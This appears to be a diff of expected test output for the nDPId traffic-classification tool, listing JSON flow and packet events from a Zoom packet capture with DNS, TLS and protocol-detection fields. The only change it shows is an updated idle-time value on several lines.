+00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569520470350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520470350,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjK4AAAAQEICiWc3wRwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569520470666,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520470666,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABI4PAAAEARFPDAqAF1wKgB\/+EV4RUANLyaU3BvdFVkcDAJFTOWktM6lAABAARIlcIDDi3QR5gZLZgtSkZtNr91y8rdz4k="} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} @@ -109,51 +109,51 @@ 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABALr4AAP8RCSjAqAF1wKgBAeLPADUALAFaRhQBAAABAAAAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQAB"} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx7AqAF11ROQadZTAbug3l1NAAAAALAC\/\/8zBgAAAgQFtAEDAwUBAQgKJZzghQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470755,"flow_last_seen":1569520470755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470755,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569520470755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx\/AqAF11ROQaNZUAbsLvInbAAAAALAC\/\/+bjgAAAgQFtAEDAwUBAQgKJZzgkQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470742,"flow_last_seen":1569520470742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470742,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569520470742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470742,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx7AqAF11ROQadZTAbug3l1NAAAAALAC\/\/8zBgAAAgQFtAEDAwUBAQgKJZzghQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470755,"flow_last_seen":1569520470755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470755,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569520470755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGEx\/AqAF11ROQaNZUAbsLvInbAAAAALAC\/\/+bjgAAAgQFtAEDAwUBAQgKJZzgkQAAAAAEAgAA"} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1569520470768,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1569520470768,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQFgoAADcR6czAqAEBwKgBdQA19GMAPOFdr1GBgAABAAEAAAAACnpvb21mcjg1emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVQ=="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470768,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr85zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.85"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470769,"flow_last_seen":1569520470769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470769,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569520470769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470769,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlHAqAF11fSMVdZVAbvq+zZHAAAAALAC\/\/8TBgAAAgQFtAEDAwUBAQgKJZzgnwAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470775,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyLVE5BpwKgBdQG71lPrn+6AoN5dTqASqbAo0wAAAgQFrAQCCAp4fR7ZJZzghQEDAww="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470775,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyrAqAF11ROQadZTAbug3l1O65\/ugYAQECzxAQAAAQEICiWc4KR4fR7Z"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470769,"flow_last_seen":1569520470769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470769,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1569520470769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470769,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlHAqAF11fSMVdZVAbvq+zZHAAAAALAC\/\/8TBgAAAgQFtAEDAwUBAQgKJZzgnwAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569520470775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470775,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyLVE5BpwKgBdQG71lPrn+6AoN5dTqASqbAo0wAAAgQFrAQCCAp4fR7ZJZzghQEDAww="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1569520470775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470775,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyrAqAF11ROQadZTAbug3l1O65\/ugYAQECzxAQAAAQEICiWc4KR4fR7Z"} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470742,"flow_last_seen":1569520470775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470775,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569520470776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1569520470776,"pkt":"KDc3AG3IEBMx8Tl2CABFAABQ61QAADcRFILAqAEBwKgBdQA14s8APF0wRhSBgAABAAEAAAAACnpvb21mcjg0emMEem9vbQJ1cwAAAQABwAwAAQABAAABLAAE1fSMVA=="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfr84zc.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"213.244.140.84"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470776,"flow_last_seen":1569520470776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569520470776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470776,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlLAqAF11fSMVNZWAbv57BLmAAAAALAC\/\/8ncAAAAgQFtAEDAwUBAQgKJZzgpQAAAAAEAgAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470787,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyPVE5BowKgBdQG71lTDwlhoC7yJ3KASqbBbBgAAAgQFrAQCCAp7WhBHJZzgkQEDAww="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470787,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyvAqAF11ROQaNZUAbsLvIncw8JYaYAQECwjNgAAAQEICiWc4K97WhBH"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470790,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1XV9IxVwKgBdQG71lXIKlM86vs2SKASqbDi9AAAAgQFrAQCCAp4gwNrJZzgnwEDAww="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470790,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl3AqAF11fSMVdZVAbvq+zZIyCpTPYAQECyrLwAAAQEICiWc4LJ4gwNr"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470801,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1bV9IxUwKgBdQG71lYtiv8U+ewS56ASqbDdrgAAAgQFrAQCCAp8tQexJZzgpQEDAww="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470801,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl7AqAF11fSMVNZWAbv57BLnLYr\/FYAQECyl5QAAAQEICiWc4Lx8tQex"} 